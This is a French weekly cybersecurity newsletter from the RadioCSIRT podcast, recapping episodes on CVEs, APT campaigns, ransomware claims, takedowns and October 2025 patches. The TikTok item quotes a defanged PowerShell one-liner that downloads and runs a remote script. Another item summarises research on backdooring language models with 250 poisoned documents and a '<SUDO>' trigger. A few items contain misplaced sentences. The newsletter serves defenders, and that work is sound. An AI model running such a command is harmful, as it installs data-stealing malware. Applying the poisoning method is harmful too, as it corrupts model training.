NewsLetter RadioCSIRT N°33

octobre 18, 2025 marc Cyber Threat Intelligence Commentaires fermés sur NewsLetter RadioCSIRT N°33

RadioCSIRT – La newsletter cyber hebdo du Podcast RadioCSIRT

Bonjour à toutes et à tous,

Cette semaine, RadioCSIRT poursuit sa mission : déchiffrer l’actualité cyber avec rigueur et précision.


De la compromission du code source de F5 à l’exploitation active d’Adobe Experience Manager, en passant par les campagnes d’espionnage Phantom Taurus et les correctifs critiques du Patch Tuesday d’octobre, l’écosystème reste sous tension.

L’approche se veut avant tout plus professionnelle, analytique et opérationnelle, à destination de celles et ceux qui défendent, enquêtent et anticipent.

Vous retrouverez ci-dessous une sélection d’articles techniques publiés sur mon blog, ainsi que le récapitulatif complet des épisodes RadioCSIRT (Ep.450 à 457) diffusés entre le 11 et le 17 octobre 2025.

Marc Frédéric GOMEZ
Fondateur de RadioCSIRT

🔎 À lire cette semaine sur mon blog

Je vous propose une nouvelle sélection de mes derniers articles publiés sur mon blog.

🔹 Compromission de F5 : code source BIG-IP volé par un acteur étatique sophistiqué
👉 Lire : https://blog.marcfredericgomez.fr/compromission-de-f5-code-source-big-ip-vole-par-un-acteur-etatique-sophistique/

🔹 APT UAC-0239 : cyberattaques ciblées en Ukraine via le framework OrcaC2 et le voleur de fichiers FileMess
👉 Lire : https://blog.marcfredericgomez.fr/uac-0239-mene-des-cyberattaques-ciblees-en-ukraine-a-laide-du-framework-orcac2-et-du-voleur-de-fichiers-filemess/

🔹 IPv6 en environnement d’entreprise : guide de sécurité opérationnelle pour les équipes de cybersécurité
👉 Lire : https://blog.marcfredericgomez.fr/ipv6-en-environnement-dentreprise-guide-de-securite-operationnelle-pour-les-equipes-de-cybersecurite/

🔹 IA générative en entreprise : anatomie d’une catastrophe silencieuse
👉 Lire : https://blog.marcfredericgomez.fr/ia-generative-en-entreprise-anatomie-dune-catastrophe-silencieuse/

🔹Patch Tuesday Octobre 2025
👉 Lire : https://blog.marcfredericgomez.fr/860-2/

🎙 Récapitulatif des épisodes du podcast de la semaine (Ep.450 au 457)

Du samedi 11 octobre au vendredi 17 octobre 2025

📅 Podcast RadioCSIRT du samedi 11 octobre 2025 (Ep.450)

📌 Au programme aujourd’hui :

🧩 7-Zip — Deux failles d’exécution de code (CVE-2025-11001 & CVE-2025-11002)
Ouverture d’archives piégées ⇒ exécution de code possible. Mettez à jour vers la dernière version officielle et durcissez vos politiques d’ouverture de fichiers.

🌊 DDoS — Botnet AISURU
Attaques record sur des FAI américains : volumétrie inédite, ciblage soutenu. Suivez l’activité en temps réel et ajustez vos seuils/mitigations.

🕵️ Extorsion & fuites — Scattered Spider / Salesforce
Nouvelle vitrine d’extorsion et bannières de saisie observées. Suivez les miroirs, mettez à jour vos IoC et préparez vos playbooks de communication.

📚 Ressources (liens complets) :
https://securityonline.info/two-7-zip-flaws-allow-code-execution-via-malicious-zip-files-cve-2025-11001-cve-2025-11002/
https://www.zerodayinitiative.com/advisories/ZDI-25-949/
https://www.zerodayinitiative.com/advisories/ZDI-25-950/
https://www.7-zip.org/download.html
https://krebsonsecurity.com/2025/10/ddos-botnet-aisuru-blankets-us-isps-in-record-ddos/
https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru-en/
https://grafana.blockgametracker.gg
https://therecord.media/breachforums-fbi-france-takedown-banner-scattered-spider-salesforce-leak
https://therecord.media/salesforce-scattered-spider-extortion-site
https://therecord.media/salesloft-hacker-broke-into-github

📅 Podcast RadioCSIRT du dimanche 12 octobre 2025 (Ep.451)

📌 Au programme aujourd’hui :

🐍 Python — CVE-2025-8291
Vulnérabilité non spécifiée affectant toutes les versions CPython non corrigées. Consultez le bulletin de sécurité officiel et appliquez les correctifs immédiatement.

🦀 ChaosBot — Malware Rust sophistiqué
Ciblage d’environnements financiers via VPN Cisco compromis + comptes AD sur-privilégiés. DLL side-loading, C2 Discord, évasion ETW. Renforcez vos contrôles VPN et auditez vos service accounts.

🎯 GXC Team — Démantèlement en Espagne
Arrestation du leader brésilien « GoogleXcoder » (25 ans). Kits de phishing IA, malware Android, 300+ entités ciblées. 6 perquisitions, canaux Telegram désactivés.

🔓 ServiceNow — Multiples CVE critiques
CVE-2025-3089 (AI Platform), CVE-2025-0337 (bypass auth), CVE-2024-8924 (SQL injection non auth). Vérifiez vos versions et planifiez les mises à jour.

🔥 SonicWall VPN — Compromission massive
100+ comptes SSL VPN compromis sur 16 clients. Authentifications depuis 202.155.8[.]73. Lien probable avec campagne Akira ransomware exploitant CVE-2024-40766.

📚 Sources :

  • https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0851/
  • https://cyberpress.org/chaosbot-ciscovpn-attack/
  • https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control
  • https://securityaffairs.com/183252/cyber-crime/cybercrime-ring-gxc-team-dismantled-in-spain-25-year-old-leader-detained.html
  • https://web.guardiacivil.es/es/destacados/noticias/La-Guardia-Civil-desmantela-una-red-de-phishing-bancario-y-detiene-al-principal-desarrollador-de-kits-de-robo-de-credenciales-en-Espana/
  • https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1226057
  • https://thehackernews.com/2025/10/experts-warn-of-widespread-sonicwall.html
  • https://www.huntress.com/blog/sonicwall-sslvpn-compromise
  • https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330

📅 Podcast RadioCSIRT du Lundi 13 octobre 2025 (Ep.452)

📌 Au programme aujourd’hui :

🧠 IA — Empoisonnement de modèles d’apprentissage
Des chercheurs de l’Institut britannique de sécurité de l’IA, d’Anthropic et de l’Institut Alan Turing démontrent qu’à peine 250 documents malveillants suffisent à créer une porte dérobée dans un modèle de langage. Le déclencheur <SUDO> provoque la génération de texte incohérent. Une étude majeure qui rebat les cartes de la sécurité de l’entraînement IA.

🏛️ Australie — Protection des infrastructures critiques
L’Australian Cyber Security Centre publie le guide CI Fortify, incitant les opérateurs d’infrastructures essentielles à renforcer leur posture. Objectifs : pouvoir isoler les systèmes OT critiques pendant 3 mois et reconstruire rapidement les environnements essentiels pour limiter les impacts d’une attaque.

🎓 EBIOS Risk Manager — Formation gratuite certifiée ANSSI
Le Club EBIOS, en partenariat avec l’ANSSI, lance un MOOC gratuit sur l’analyse de risques. Une formation accessibles à tous, sans prérequis, pour découvrir la méthode EBIOS Risk Manager et obtenir un diplôme certifié par l’agence nationale.

🎓 Harvard — Piratage revendiqué par Clop
Le groupe Clop ransomware revendique l’attaque de l’Université Harvard. Une page dédiée est apparue sur son site de fuite Tor, annonçant la diffusion prochaine des données volées. Clop, actif depuis 2019 et issu du groupe TA505, continue de cibler des institutions à forte valeur médiatique.

📚 Sources :
https://next.ink/203904/250-documents-suffisent-a-empoisonner-lentrainement-dune-ia/
https://www.cyber.gov.au/view-all-content/news/new-guidance-to-help-fortify-australias-critical-infrastructure
https://securityaffairs.com/183282/cyber-crime/clop-ransomware-group-claims-the-hack-of-harvard-university.html
https://lms.club-ebios.org/

📅 Podcast RadioCSIRT du mardi 14 octobre 2025 (Ep.453)

📌 Au programme aujourd’hui :

🦠 Astaroth — Trojan bancaire exploitant GitHub
McAfee Labs découvre une campagne du malware Astaroth ciblant principalement le Brésil. Le trojan abuse des dépôts GitHub pour héberger ses configurations via stéganographie. L’infection débute par phishing avec fichier point lnk, déploie un shellcode AutoIT, puis intercepte les frappes clavier sur les sites bancaires et crypto. 15 milliards de dollars saisis, plus grande saisie de l’histoire du DOJ.

🏛️ Cambodge — 15 milliards de dollars saisis au Prince Group
Le Département de la Justice américain saisit 127.271 bitcoins liés à Chen Zhi, président du conglomérat cambodgien Prince Group. Il supervisait au moins 10 complexes d’arnaque utilisant du travail forcé pour du pig butchering. Les documents internes révèlent 76.000 comptes contrôlés et 30 millions de dollars de profits quotidiens. Le Trésor sanctionne 146 personnes et entités dont 117 sociétés écrans.

Flax Typhoon — Backdoor via ArcGIS Server pendant un an
ReliaQuest attribue une campagne d’espionnage au groupe chinois Flax Typhoon. Les attaquants ont modifié une extension Java Server Object d’ArcGIS en web shell protégé par clé hardcodée. Un exécutable SoftEther VPN renommé bridge point exe crée un canal VPN covert permettant mouvements latéraux et exfiltration. Persistence assurée via sauvegardes système.

🔐 Botnet — 100.000 IP attaquent les services RDP américains
GreyNoise détecte un botnet ciblant les services Remote Desktop Protocol aux États-Unis depuis le 8 octobre. Les attaques proviennent de plus de 100.000 adresses IP dans plus de 100 pays. Une seule entité contrôle le botnet avec empreinte TCP partagée. Deux vecteurs utilisés : attaques de timing RD Web Access et énumération de connexion client web RDP.

🚨 CISA — Cinq vulnérabilités ajoutées au catalogue KEV
La CISA ajoute cinq CVE exploitées activement le 14 octobre. La CVE-2016-7836 affecte SKYSEA Client View, la CVE-2025-6264 Rapid7 Velociraptor, la CVE-2025-24990 et la CVE-2025-59230 Microsoft Windows, la CVE-2025-47827 IGEL OS. La directive BOD 22-01 exige la remédiation par les agences fédérales avant la date limite.

📚 Sources :

🐂 Phantom Taurus — Campagne d’espionnage ciblée en Asie et en Europe
Unit42 révèle une activité soutenue du groupe Phantom Taurus (alias APT15), exploitant des implants personnalisés pour infiltrer des institutions gouvernementales et diplomatiques. Le malware, dissimulé dans des documents Office, utilise un mécanisme de commande et contrôle via des serveurs compromis hébergés sur des infrastructures légitimes. Les opérateurs cherchent à exfiltrer des données sensibles sur la politique étrangère et la défense.

CERT-UA — Campagne d’hameçonnage massive contre les institutions ukrainiennes

Le CERT-UA alerte sur une vague de spear-phishing attribuée à UAC-0050, exploitant des pièces jointes Excel malveillantes. L’objectif : déployer un script PowerShell téléchargeant un binaire compressé via archive ZIP. Les charges utiles mènent à des implants capables de capturer les frappes clavier et les données d’authentification de messageries internes.


🏢 NCSC — Un nouveau kit de cybersécurité pour les petites entreprises
Le National Cyber Security Centre (Royaume-Uni) lance un Cyber Security Toolkit for Small Businesses, un ensemble de guides pratiques couvrant la gestion des mots de passe, les sauvegardes, la protection des comptes cloud et la détection d’activités suspectes. L’objectif : renforcer la résilience des PME face à la montée des attaques par rançongiciel et fraude par e-mail.


☕ Oracle — Patch d’urgence pour E-Business Suite
Oracle publie un correctif hors cycle pour une vulnérabilité critique affectant E-Business Suite (versions 12.2.3 à 12.2.14). Référencée CVE-2025-61882, la faille permet une exécution de code à distance sans authentification et serait activement exploitée par des acteurs malveillants, dont le groupe Cl0p.


🦊 Mozilla — Lancement en bêta du VPN Firefox pour Windows et macOS
Mozilla annonce la bêta publique de son service Firefox VPN. Intégré nativement au navigateur, il utilise le protocole WireGuard et se concentre sur la confidentialité. Les premiers tests montrent une réduction moyenne de 8 % des performances réseau, mais un chiffrement efficace du trafic DNS et des connexions sortantes.


🏭 SAP NetWeaver — Nouvelle vulnérabilité critique CVE-2025-7521
Une faille d’injection de code découverte dans le composant SAP NetWeaver Application Server Java permet à un attaquant non authentifié d’exécuter du code à distance. The Hacker News précise que la vulnérabilité réside dans le module de gestion des requêtes HTTP et pourrait compromettre des environnements ERP entiers si non corrigée.

📚 Sources :
https://unit42.paloaltonetworks.com/phantom-taurus/
https://cert.gov.ua/article/6285731
https://www.ncsc.gov.uk/news/small-businesses-receive-cyber-security-boost-with-new-toolkit-from-experts
https://www.theregister.com/2025/10/14/oracle_rushes_out_another_emergency/
https://www.theregister.com/2025/10/14/mozilla_firefox_vpn_beta/
https://thehackernews.com/2025/10/new-sap-netweaver-bug-lets-attackers.html

📅 Podcast RadioCSIRT du jeudi 16 octobre 2025 (Ep.455)

📌 Au programme aujourd’hui :

🔥 F5 Networks — Intrusion majeure par acteur étatique
F5 révèle une compromission détectée le 9 août 2025. Un acteur étatique sophistiqué a maintenu un accès persistant long terme dans les environnements de développement BIG-IP. Code source exfiltré, informations sur des vulnérabilités non publiques dérobées.

La CISA publie la directive d’urgence 26-01 ordonnant aux agences fédérales de patcher avant le 22 octobre.

Le NCSC britannique émet également une alerte. Risque : exploitation des produits F5 pour voler credentials et clés API, permettant mouvements latéraux et accès persistants dans les réseaux cibles.

📊 CERT-FR — 46 vulnérabilités corrigées dans l’écosystème F5
Le CERT-FR publie l’avis CERTFR-2025-AVI-0886. F5 corrige 46 CVE dans son bulletin K000156572 du 15 octobre. Impacts multiples : RCE, élévation de privilèges, SSRF, XSS et déni de service. Tous les BIG-IP sont concernés : versions 15.1.x, 16.1.x, 17.1.x et 17.5.x nécessitent une mise à jour immédiate. Également touchés : BIG-IP Next CNF, BIG-IP Next pour Kubernetes, BIG-IP Next SPK et NGINX App Protect WAF avant la version 4.7.0.

💬 Mattermost — Multiples failles de sécurité
Le CERT-FR alerte via l’avis CERTFR-2025-AVI-0888 sur six bulletins de sécurité Mattermost publiés le 15 octobre : MMSA-2025-00465, 00492, 00493, 00518, 00540 et 00541. Versions vulnérables : Mattermost Server 10.5.x avant 10.5.12, 10.10.x avant 10.10.3, 10.11.x avant 10.11.4, 10.12.x avant 10.12.1, et toutes les versions 11.x avant 11.0.0. La nature exacte des risques n’est pas précisée par l’éditeur.

🚨 Adobe Experience Manager — CVE-2025-54253 exploitée activement
La CISA ajoute la CVE-2025-54253 à son catalogue KEV. Score CVSS 10.0 sur 10. Exploitation active confirmée dans la nature. Cette faille de mauvaise configuration affecte Adobe Experience Manager Forms versions 6.5.23 et antérieures, permettant une RCE sans authentification ni interaction utilisateur. Découverte par Adam Kues et Shubham Shah de Searchlight Cyber, divulguée le 28 avril, patchée en août. Un proof-of-concept est public. Deadline CISA pour les agences fédérales : 5 novembre 2025.

📚 Sources :
https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network
https://www.cisa.gov/news-events/news/cisa-issues-emergency-directive-address-critical-vulnerabilities-f5-devices https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0886/ https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0888/ https://www.bleepingcomputer.com/news/security/cisa-maximum-severity-adobe-flaw-now-exploited-in-attacks/

📅 Podcast RadioCSIRT Patch Tuesday octobre 2025 (Ep.456)

📌 Au programme aujourd’hui :

🧩 Microsoft — 172 vulnérabilités corrigées, 6 zero-days
Le Patch Tuesday d’octobre corrige 172 failles, dont 6 zero-days et 8 vulnérabilités critiques.
Fin de support pour Windows 10, remplacé par le programme Extended Security Updates (ESU).

Les zero-days exploitées sont :

  • CVE-2025-24990 — Agere Modem Driver, élévation de privilèges, pilote supprimé du système. Attribution : Fabian Mosch et Jordan Jay.
  • CVE-2025-59230 — Windows Remote Access Connection Manager, élévation de privilèges locale, exploitation active. Attribution : MSTIC et MSRC.
  • CVE-2025-47827 — Secure Boot bypass dans IGEL OS avant la version 11, découverte par Zack Didcott.

Les zéro-days divulguées publiquement :

  • CVE-2025-0033 — AMD EPYC SEV-SNP, corruption RMP lors de l’initialisation. Chercheurs : Benedict SchlueterSupraja SridharaShweta Shinde (ETH Zurich).
  • CVE-2025-24052 — Variante de la faille Agere Modem, exploitable même sans modem actif.
  • CVE-2025-2884 — TCG TPM 2.0, lecture hors limites, risque de divulgation d’informations. Attribution : Trusted Computing Group et chercheur anonyme.

🚨 CVE-2025-59287 — Windows Server Update Services (WSUS)
Faille critique d’exécution de code à distance, score CVSS 9.8.
Vecteur réseau, aucune authentification requise. Microsoft qualifie l’exploitation comme « plus probable ».

📄 Microsoft Office et composants associés
Plusieurs vulnérabilités RCE via le Preview Pane (CVE-2025-59227, CVE-2025-59234).
Correctifs aussi pour Azure, Entra ID, Copilot, Kernel, BitLocker, Exchange, SharePoint, .NET et Visual Studio.

🔧 Autres éditeurs — Mises à jour d’octobre 2025

  • Adobe : correctifs multiples.
  • Cisco : IOS, UCM, Cyber Vision Center.
  • Draytek : RCE pré-auth sur routeurs Vigor.
  • Gladinet : zero-day CentreStack activement exploitée.
  • Ivanti : correctifs pour EPMM et Neurons for MDM.
  • Oracle : deux zero-days dans E-Business Suite.
  • Redis : RCE de sévérité maximale.
  • SAP : faille critique d’exécution de commande dans NetWeaver.
  • Synacor : zero-day dans Zimbra Collaboration Suite exploitée pour vol de données.

🧭 Cycle de vie Microsoft
Derniers correctifs gratuits pour Windows 10Office 2016/2019Exchange 2016/2019.
Remplacement d’Exchange Server par Exchange Server Subscription Edition.

⚡️ On ne réfléchit pas, on patch !

📚 Sources :
https://krebsonsecurity.com/2025/10/patch-tuesday-october-2025-end-of-10-edition/
https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/
https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/

📅 Podcast RadioCSIRT vendredi 17 octobre 2025 (Ep.457)

📌 Au programme aujourd’hui :

🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite
Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.
Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré.
La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884.

👮 Europol — Démantèlement d’un réseau international de SIM-box
L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.
1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.
Deux sites web, gogetsms.com et apisim.com, ont été saisis.
Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau.

📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539
Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.
Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.
Score CVSS 9.8, sans privilèges ni interaction.
Corrigée en version 2.4.0, supprimant le mécanisme vulnérable.

🎬 TikTok — Campagne PowerShell diffusant AuroStealer
Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell :
iex (irm slmgr[.]win/photoshop)
Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données.
Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque.

📨 Zendesk — Détournement massif des workflows de support
Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk.
Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles.
Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ».

⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire
Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBrokerShinyHuntersHollowNoct, et Depressed.
Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière.
Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C.

📚 Sources :
https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/
https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/
https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/
https://cyberpress.org/tiktok-powershell-malware/
https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/
https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm

📞 Partagez vos retours
📱 07 68 72 20 09
📧 radiocsirt@gmail.com
🌐 https://www.radiocsirt.org